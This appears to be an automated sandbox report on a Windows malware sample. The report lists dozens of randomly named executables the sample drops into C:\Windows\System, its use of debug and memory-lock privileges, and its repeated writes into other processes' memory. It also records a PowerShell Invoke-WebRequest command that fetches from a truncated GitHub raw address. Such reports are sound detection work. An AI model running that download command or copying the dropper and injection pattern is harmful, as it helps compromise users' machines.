File created C:\Windows\System\lgzUItv.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\EXcNcXc.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ssjrTVn.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\GDUzpOO.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\nPgqhsd.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\MibPxQk.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\AiFhBcM.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\hGMPxZt.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\uXxfhUt.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\oVYAaro.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\cLeIOLy.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\anQWdbm.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\rWyPAoo.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\KbNVKbl.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\UQliRHb.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\GLETVmE.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\HCFJfYF.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\AAjpnXI.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\BSaplzX.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\USRdeVY.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\vtbeGGj.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\NSbQMyY.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\FSMjLDx.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\JUtklyL.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZCxgipG.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\jgSZLmQ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\EOJzwHH.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\jWWvlSt.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\wYeQTqJ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\oIpESqS.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\tdOCnGi.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\aIwbPBR.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\QNjnpPS.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\qgOQVxV.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\RIqoXwV.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\QjVMIqG.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\reVUriJ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ejAFgsa.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\VSWzHQi.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\CsUfrnB.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\JYBZDDo.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\PtSOUAI.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\pNCpAtc.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\BBNJKpQ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\tpYKacW.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\lAaMpQc.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\sSKRRNX.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ritVNfB.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\lzfaaPu.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\euZrYwa.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2168 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2168 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2168 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2168 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\rsaqHtl.exe
PID 2168 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\rsaqHtl.exe
PID 2168 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\rsaqHtl.exe
PID 2168 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\HEmcQsX.exe
PID 2168 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\HEmcQsX.exe
PID 2168 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\HEmcQsX.exe
PID 2168 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\FDLFJfA.exe
PID 2168 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\FDLFJfA.exe
PID 2168 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\FDLFJfA.exe
PID 2168 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\veogiwJ.exe
PID 2168 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\veogiwJ.exe
PID 2168 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\veogiwJ.exe
PID 2168 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\CuuMPLw.exe
PID 2168 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\CuuMPLw.exe
PID 2168 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\CuuMPLw.exe
PID 2168 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\FyVDcbd.exe
PID 2168 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\FyVDcbd.exe
PID 2168 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\FyVDcbd.exe
PID 2168 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\qgOQVxV.exe
PID 2168 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\qgOQVxV.exe
PID 2168 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\qgOQVxV.exe
PID 2168 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\HmgDmmO.exe
PID 2168 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\HmgDmmO.exe
PID 2168 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\HmgDmmO.exe
PID 2168 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\PdEiZfn.exe
PID 2168 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\PdEiZfn.exe
PID 2168 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\PdEiZfn.exe
PID 2168 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\oRximgK.exe
PID 2168 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\oRximgK.exe
PID 2168 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\oRximgK.exe
PID 2168 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\ZtFfVLF.exe
PID 2168 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\ZtFfVLF.exe
PID 2168 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\ZtFfVLF.exe
PID 2168 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\AXovjEj.exe
PID 2168 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\AXovjEj.exe
PID 2168 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\AXovjEj.exe
PID 2168 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\Ueqblbk.exe
PID 2168 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\Ueqblbk.exe
PID 2168 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\Ueqblbk.exe
PID 2168 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\CTyTPAX.exe
PID 2168 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\CTyTPAX.exe
PID 2168 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\CTyTPAX.exe
PID 2168 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\gShbcXR.exe
PID 2168 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\gShbcXR.exe
PID 2168 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\gShbcXR.exe
PID 2168 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\eJvTilp.exe
PID 2168 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\eJvTilp.exe
PID 2168 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\eJvTilp.exe
PID 2168 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\ritVNfB.exe
PID 2168 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\ritVNfB.exe
PID 2168 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\ritVNfB.exe
PID 2168 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\qGHEQog.exe
PID 2168 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\qGHEQog.exe
PID 2168 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\qGHEQog.exe
PID 2168 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\IbXSfvt.exe
PID 2168 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\IbXSfvt.exe
PID 2168 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\IbXSfvt.exe
PID 2168 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\JTWrtFp.exe
PID 2168 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\JTWrtFp.exe
PID 2168 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\JTWrtFp.exe
PID 2168 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\OWcIGNe.exe

Processes

C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\rsaqHtl.exe

C:\Windows\System\rsaqHtl.exe

C:\Windows\System\HEmcQsX.exe

C:\Windows\System\HEmcQsX.exe

C:\Windows\System\FDLFJfA.exe

C:\Windows\System\FDLFJfA.exe

C:\Windows\System\veogiwJ.exe

C:\Windows\System\veogiwJ.exe

C:\Windows\System\CuuMPLw.exe

C:\Windows\System\CuuMPLw.exe

C:\Windows\System\FyVDcbd.exe

C:\Windows\System\FyVDcbd.exe

C:\Windows\System\qgOQVxV.exe

C:\Windows\System\qgOQVxV.exe

C:\Windows\System\HmgDmmO.exe

C:\Windows\System\HmgDmmO.exe

C:\Windows\System\PdEiZfn.exe

C:\Windows\System\PdEiZfn.exe

C:\Windows\System\oRximgK.exe

C:\Windows\System\oRximgK.exe

C:\Windows\System\ZtFfVLF.exe

C:\Windows\System\ZtFfVLF.exe

C:\Windows\System\AXovjEj.exe

C:\Windows\System\AXovjEj.exe

C:\Windows\System\Ueqblbk.exe

C:\Windows\System\Ueqblbk.exe

C:\Windows\System\CTyTPAX.exe

C:\Windows\System\CTyTPAX.exe

C:\Windows\System\gShbcXR.exe

C:\Windows\System\gShbcXR.exe

C:\Windows\System\eJvTilp.exe

C:\Windows\System\eJvTilp.exe

C:\Windows\System\ritVNfB.exe

C:\Windows\System\ritVNfB.exe

C:\Windows\System\qGHEQog.exe

C:\Windows\System\qGHEQog.exe

C:\Windows\System\IbXSfvt.exe

C:\Windows\System\IbXSfvt.exe

C:\Windows\System\JTWrtFp.exe

C:\Windows\System\JTWrtFp.exe

C:\Windows\System\OWcIGNe.exe

C:\Windows\System\OWcIGNe.exe

C:\Windows\System\vbEAZlR.exe

C:\Windows\System\vbEAZlR.exe

C:\Windows\System\FcFEQuq.exe

C:\Windows\System\FcFEQuq.exe

C:\Windows\System\EHUwXix.exe

C:\Windows\System\EHUwXix.exe

C:\Windows\System\AAjpnXI.exe

C:\Windows\System\AAjpnXI.exe

C:\Windows\System\plqsgBC.exe

C:\Windows\System\plqsgBC.exe

C:\Windows\System\sfgWhNp.exe

C:\Windows\System\sfgWhNp.exe

C:\Windows\System\amWkTNr.exe

C:\Windows\System\amWkTNr.exe

C:\Windows\System\Buzjupm.exe

C:\Windows\System\Buzjupm.exe

C:\Windows\System\IvKtifA.exe

C:\Windows\System\IvKtifA.exe

C:\Windows\System\fLdZRfj.exe

C:\Windows\System\fLdZRfj.exe

C:\Windows\System\kFLapLH.exe

C:\Windows\System\kFLapLH.exe

C:\Windows\System\fMYSmqT.exe

C:\Windows\System\fMYSmqT.exe

C:\Windows\System\SpGaijO.exe

C:\Windows\System\SpGaijO.exe

C:\Windows\System\wTknWCV.exe

C:\Windows\System\wTknWCV.exe

C:\Windows\System\xnqIxUQ.exe

C:\Windows\System\xnqIxUQ.exe

C:\Windows\System\UXBmnFy.exe

C:\Windows\System\UXBmnFy.exe

C:\Windows\System\IDtXrbS.exe

C:\Windows\System\IDtXrbS.exe

C:\Windows\System\OHjcwTd.exe

C:\Windows\System\OHjcwTd.exe

C:\Windows\System\sdpFOBu.exe

C:\Windows\System\sdpFOBu.exe

C:\Windows\System\mUMZYou.exe

C:\Windows\System\mUMZYou.exe

C:\Windows\System\qzmKmAh.exe

C:\Windows\System\qzmKmAh.exe

C:\Windows\System\xfPBgbv.exe

C:\Windows\System\xfPBgbv.exe

C:\Windows\System\IKOPUhv.exe

C:\Windows\System\IKOPUhv.exe

C:\Windows\System\qbBVwiK.exe

C:\Windows\System\qbBVwiK.exe

C:\Windows\System\zswsRPM.exe

C:\Windows\System\zswsRPM.exe

C:\Windows\System\habowhw.exe

C:\Windows\System\habowhw.exe

C:\Windows\System\rHSKgGq.exe

C:\Windows\System\rHSKgGq.exe

C:\Windows\System\IlNRuAV.exe

C:\Windows\System\IlNRuAV.exe

C:\Windows\System\GOZtNGo.exe

C:\Windows\System\GOZtNGo.exe

C:\Windows\System\cEKRQnQ.exe

C:\Windows\System\cEKRQnQ.exe

C:\Windows\System\sobJxBP.exe

C:\Windows\System\sobJxBP.exe

C:\Windows\System\RQEmYEN.exe

C:\Windows\System\RQEmYEN.exe

C:\Windows\System\CfGlpZU.exe

C:\Windows\System\CfGlpZU.exe

C:\Windows\System\mMyYmyk.exe

C:\Windows\System\mMyYmyk.exe

C:\Windows\System\qqTJqNG.exe

C:\Windows\System\qqTJqNG.exe

C:\Windows\System\aTgRNRL.exe

C:\Windows\System\aTgRNRL.exe

C:\Windows\System\fXngNNA.exe

C:\Windows\System\fXngNNA.exe

C:\Windows\System\NteQZSL.exe

C:\Windows\System\NteQZSL.exe

C:\Windows\System\NRVqXXT.exe

C:\Windows\System\NRVqXXT.exe

C:\Windows\System\trIlcIh.exe

C:\Windows\System\trIlcIh.exe

C:\Windows\System\aGPNuYk.exe

C:\Windows\System\aGPNuYk.exe

C:\Windows\System\sSOTbIk.exe

C:\Windows\System\sSOTbIk.exe

C:\Windows\System\lXrlqVp.exe

C:\Windows\System\lXrlqVp.exe

C:\Windows\System\JHOxBre.exe

C:\Windows\System\JHOxBre.exe

C:\Windows\System\xdHfnFn.exe

C:\Windows\System\xdHfnFn.exe

C:\Windows\System\igBpKVZ.exe

C:\Windows\System\igBpKVZ.exe

C:\Windows\System\RPqmrxv.exe

C:\Windows\System\RPqmrxv.exe

C:\Windows\System\hOvCkiq.exe

C:\Windows\System\hOvCkiq.exe

C:\Windows\System\oHiuqvY.exe

C:\Windows\System\oHiuqvY.exe

C:\Windows\System\SseuuYJ.exe

C:\Windows\System\SseuuYJ.exe

C:\Windows\System\nXgUWam.exe

C:\Windows\System\nXgUWam.exe

C:\Windows\System\ZTPvfru.exe

C:\Windows\System\ZTPvfru.exe

C:\Windows\System\ZlQKqtk.exe

C:\Windows\System\ZlQKqtk.exe

C:\Windows\System\RjxFMCv.exe

C:\Windows\System\RjxFMCv.exe

C:\Windows\System\QUIZMFj.exe

C:\Windows\System\QUIZMFj.exe

C:\Windows\System\NBciuCf.exe

C:\Windows\System\NBciuCf.exe

C:\Windows\System\uxtQszK.exe

C:\Windows\System\uxtQszK.exe

C:\Windows\System\mnKajIN.exe

C:\Windows\System\mnKajIN.exe

C:\Windows\System\QVDEZMU.exe

C:\Windows\System\QVDEZMU.exe

C:\Windows\System\stAjkiT.exe

C:\Windows\System\stAjkiT.exe

C:\Windows\System\QYZIGXg.exe

C:\Windows\System\QYZIGXg.exe

C:\Windows\System\jjkAhVU.exe

C:\Windows\System\jjkAhVU.exe

C:\Windows\System\XaYnwAb.exe

C:\Windows\System\XaYnwAb.exe

C:\Windows\System\xSRBuBE.exe

C:\Windows\System\xSRBuBE.exe

C:\Windows\System\IcQzzjl.exe

C:\Windows\System\IcQzzjl.exe

C:\Windows\System\BVZDgjg.exe

C:\Windows\System\BVZDgjg.exe

C:\Windows\System\dNGVHft.exe

C:\Windows\System\dNGVHft.exe

C:\Windows\System\VoWCHuB.exe

C:\Windows\System\VoWCHuB.exe

C:\Windows\System\JzkNtUg.exe

C:\Windows\System\JzkNtUg.exe

C:\Windows\System\yHClErI.exe

C:\Windows\System\yHClErI.exe

C:\Windows\System\WJaDtgd.exe

C:\Windows\System\WJaDtgd.exe

C:\Windows\System\biznDdJ.exe

C:\Windows\System\biznDdJ.exe

C:\Windows\System\cPtbVTj.exe

C:\Windows\System\cPtbVTj.exe

C:\Windows\System\nlxwSMM.exe

C:\Windows\System\nlxwSMM.exe

C:\Windows\System\iYnrjuR.exe

C:\Windows\System\iYnrjuR.exe

C:\Windows\System\RajCYfV.exe

C:\Windows\System\RajCYfV.exe

C:\Windows\System\ciETKMj.exe

C:\Windows\System\ciETKMj.exe

C:\Windows\System\owLpZpk.exe

C:\Windows\System\owLpZpk.exe

C:\Windows\System\aTfoJVW.exe

C:\Windows\System\aTfoJVW.exe

C:\Windows\System\EwJxLTc.exe

C:\Windows\System\EwJxLTc.exe

C:\Windows\System\hXJopLR.exe

C:\Windows\System\hXJopLR.exe

C:\Windows\System\owdCnIL.exe

C:\Windows\System\owdCnIL.exe

C:\Windows\System\VqBAbxs.exe

C:\Windows\System\VqBAbxs.exe

C:\Windows\System\xzVFwPY.exe

C:\Windows\System\xzVFwPY.exe

C:\Windows\System\ekQmhPC.exe

C:\Windows\System\ekQmhPC.exe

C:\Windows\System\AKqvxNh.exe

C:\Windows\System\AKqvxNh.exe

C:\Windows\System\ZMvBmsy.exe

C:\Windows\System\ZMvBmsy.exe

C:\Windows\System\TjXPGOP.exe

